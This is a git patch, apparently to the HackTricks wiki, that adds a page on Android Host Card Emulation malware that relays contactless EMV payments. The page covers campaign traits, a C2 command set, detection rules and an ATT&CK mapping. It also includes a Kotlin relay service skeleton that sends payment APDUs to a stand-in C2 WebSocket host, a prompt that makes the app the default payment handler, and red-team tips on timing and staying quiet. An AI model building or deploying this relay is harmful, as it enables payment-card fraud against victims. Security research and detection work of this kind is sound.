From d9323976671ba0fbce975597416ed36152b2ed90 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 31 Oct 2025 12:51:24 +0000 Subject: [PATCH] Add content from: Tap-and-Steal: The Rise of NFC Relay Malware on Mobile Devic... --- src/SUMMARY.md | 1 + .../android-app-pentesting/README.md | 3 +- .../android-hce-nfc-emv-relay-attacks.md | 197 ++++++++++++++++++ 3 files changed, 200 insertions(+), 1 deletion(-) create mode 100644 src/mobile-pentesting/android-app-pentesting/android-hce-nfc-emv-relay-attacks.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 587b21c2bea..563c0300192 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -349,6 +349,7 @@ - [Accessibility Services Abuse](mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md) - [Android Anti Instrumentation And Ssl Pinning Bypass](mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md) - [Android Applications Basics](mobile-pentesting/android-app-pentesting/android-applications-basics.md) + - [Android Hce Nfc Emv Relay Attacks](mobile-pentesting/android-app-pentesting/android-hce-nfc-emv-relay-attacks.md) - [Android Task Hijacking](mobile-pentesting/android-app-pentesting/android-task-hijacking.md) - [ADB Commands](mobile-pentesting/android-app-pentesting/adb-commands.md) - [APK decompilers](mobile-pentesting/android-app-pentesting/apk-decompilers.md) diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index 01ed3a94932..7e55967ef9f 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -29,6 +29,7 @@ Sometimes it is interesting to **modify the application code** to access **hidde - [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md) - [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md) - [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md) +- [NFC/EMV Relay via HCE (Android Tap-to-Pay abuse)](android-hce-nfc-emv-relay-attacks.md) - **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd) - Extract APK from device: @@ -874,4 +875,4 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th - [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools) - [CoRPhone — Android in-memory JNI execution and packaging pipeline](https://github.com/0xdevil/corphone) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/mobile-pentesting/android-app-pentesting/android-hce-nfc-emv-relay-attacks.md b/src/mobile-pentesting/android-app-pentesting/android-hce-nfc-emv-relay-attacks.md new file mode 100644 index 00000000000..dd33a1c32a6 --- /dev/null +++ b/src/mobile-pentesting/android-app-pentesting/android-hce-nfc-emv-relay-attacks.md @@ -0,0 +1,197 @@ +# Android HCE NFC/EMV Relay Attacks + +{{#include ../../banners/hacktricks-training.md}} + +## Overview + +Abuse of Android Host Card Emulation (HCE) allows a malicious app set as the default NFC payment service to relay EMV contactless transactions in real-time. The POS terminal talks ISO 14443-4/EMV to the phone; the app’s HostApduService receives APDUs and forwards them over a bidirectional C2 (often WebSocket) to a backend that crafts responses, which are relayed back to the POS. This enables live card emulation without local card data. Campaigns observed at scale rebrand as banks/government apps, prompt to become the default payment app, and auto-exfiltrate device/card data to Telegram bots/channels. + +Key traits +- Android components: HostApduService + default NFC payment handler (category "payment") +- Transport/C2: WebSocket for APDU relay; Telegram bot API for exfil/ops +- Operator workflow: structured commands (login, register_device, apdu_command/apdu_response, get_pin/pin_response, paired, check_status, update_required, telegram_notification, error) +- Roles: scanner (read EMV data) vs tapper (HCE/relay) builds + +## Minimal implementation building blocks + +### Manifest (become default payment HCE service) + +```xml + + + + + + + + + + + +``` + +Example AID list with EMV payment category (only apps set as default payment can answer these AIDs): + +```xml + + + + + + + + + + + +``` + +Prompt user to set default payment app (opens OS settings): + +```kotlin +val intent = Intent("android.settings.NFC_PAYMENT_SETTINGS") +startActivity(intent) +``` + +### HostApduService relay skeleton + +```kotlin +class EmvRelayService : HostApduService() { + private var ws: okhttp3.WebSocket? = null + + override fun onCreate() { + super.onCreate() + // Establish C2 WebSocket early; authenticate and register device + val client = okhttp3.OkHttpClient() + val req = okhttp3.Request.Builder().url("wss://c2.example/ws").build() + ws = client.newWebSocket(req, object : okhttp3.WebSocketListener() {}) + } + + override fun processCommandApdu(commandApdu: ByteArray?, extras: Bundle?): ByteArray { + // Marshal APDU to C2 and block until response + val id = System.nanoTime() + val msg = mapOf( + "type" to "apdu_command", + "id" to id, + "data" to commandApdu!!.toHex() + ) + val response = sendAndAwait(msg) // wait for matching apdu_response{id} + return response.hexToBytes() + } + + override fun onDeactivated(reason: Int) { + ws?.send("{\"type\":\"card_removed\"}") + } + + private fun sendAndAwait(m: Any): String { + // Implement correlation + timeout; handle error/blocked status + // ... + return "9000" // fall back to SW success if needed + } +} +``` + +Utility note: Background service must respond within the POS timeout budget (~few hundred ms) per APDU; maintain a low-latency socket and pre-auth with the C2. Persist across process death using a foreground service as needed. + +### Typical C2 command set (observed) + +```text +login / login_response +register / register_device / register_response +logout +apdu_command / apdu_response +card_info / clear_card_info / card_removed +get_pin / pin_response +check_status / status_response +paired / unpaired +update_required +telegram_notification / telegram_response +error +``` + +### EMV contactless exchange (primer) + +The POS drives the flow; the HCE app simply relays APDUs: + +- SELECT PPSE (2PAY.SYS.DDF01) + - 00 A4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00 +- SELECT application AID (e.g., VISA A0000000031010) + - 00 A4 04 00 len 00 +- GET PROCESSING OPTIONS (GPO) + - 80 A8 00 00 Lc 00 +- READ RECORD(S) per AFL + - 00 B2 0C 00 +- GENERATE AC (ARQC/TC) + - 80 AE 80 00 Lc 00 + +In a relay, the backend crafts valid FCI/FCP, AFL, records and a cryptogram; the phone only forwards bytes. + +## Operator workflows seen in the wild + +- Deception + install: app re-skins as bank/gov portal, presents full-screen WebView and immediately requests to become default NFC payment app. +- Event-triggered activation: NFC tap wakes HostApduService; the relay begins. +- Scanner/Tapper roles: one build reads EMV data from a victim card (PAN, exp, tracks, device/EMV fields) and exfiltrates; another build (or the same device later) performs HCE relay to a POS. +- Exfiltration: device/card data is auto-posted to private Telegram channels/bots; WebSocket coordinates sessions and UI prompts (e.g., on-device PIN UI). + +## Evasion at scale (observed) + +- Heavy use of brand impersonation (localized app names/icons, bank/gov lookalikes) +- Packing/obfuscation (e.g., JSONPacker) to suppress static detections +- Fast re-skins and multi-C2 infra; dozens of Telegram bots/channels for ops + +## Detection and hunting (static + dynamic) + +Static (manifest/code) +- Manifest service with android.permission.BIND_NFC_SERVICE and intent action android.nfc.cardemulation.action.HOST_APDU_SERVICE +- AID list with android:category="payment" and PPSE/AIDs (e.g., 32504159... for 2PAY.SYS.DDF01, A0000000031010, A0000000041010) +- Calls opening NFC payment settings (android.settings.NFC_PAYMENT_SETTINGS) +- WebSocket usage in background service; Telegram bot libraries/API domains +- Obfuscator/packer signatures (e.g., JSONPacker) + +Dynamic/behavioral +- Unknown app becomes default NFC payment handler +- HostApduService awakened on NFC tap; tight sequence of apdu_command/apdu_response pairs +- Persistent WebSocket connections to unknown infra during/after NFC events +- Telegram bot API traffic; Telegram channel/bot IDs embedded + +Suggested telemetry rules +- Flag any app requesting or set as default payment + hosting HostApduService +- Monitor for PPSE/AID filters in AID XML and HCE category=payment +- Detect APDU relay patterns immediately after ACTION_TAG_DISCOVERED/HCE wakeup +- Alert on embedded hardcoded WebSocket endpoints used only when NFC is active + +## MITRE ATT&CK (Mobile) mapping + +- Initial Access: T1660 Phishing (malicious app delivery) +- Persistence: T1624 Event-Triggered Execution (HCE service on NFC events) +- Defense Evasion: T1655.001 Masquerading (brand impersonation) +- Obfuscation: T1406.002 Software Packing (JSONPacker) +- C2: T1636.002 Web Service: Bidirectional Communication (WebSockets) +- Exfiltration: T1646 Exfiltration Over C2 Channel + +## Notes for red team labs + +- A “lab-relay” can be built with two phones: Phone A in reader mode harvesting EMV data; Phone B running HCE with a relay backend. Use real POS test terminals or development kits to validate timings and cryptogram correctness. +- Time budget: POS APDU timeouts are strict; maintain a warm WebSocket and pre-authorize at session start. +- Do not persist PAN/CVV or store tracks on-device; pure relay is quieter and faster. + +## Related + +For smartcard/JavaCard APDU exploitation techniques, see the eSIM/JavaCard page in HackTricks: +- Check generic APDU exploitation patterns here: ../../generic-hacking/esim-javacard-exploitation.md + +## References + +- [Zimperium – Tap-and-Steal: The Rise of NFC Relay Malware on Mobile Devices](https://zimperium.com/blog/tap-and-steal-the-rise-of-nfc-relay-malware-on-mobile-devices) +- [Android HostApduService](https://developer.android.com/reference/android/nfc/cardemulation/HostApduService) +- [Android HCE and Card Emulation docs](https://developer.android.com/guide/topics/connectivity/nfc/hce) +- [Zimperium IOCs – 2025-10-NFCStealer](https://github.com/Zimperium/IOC/tree/master/2025-10-NFCStealer) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file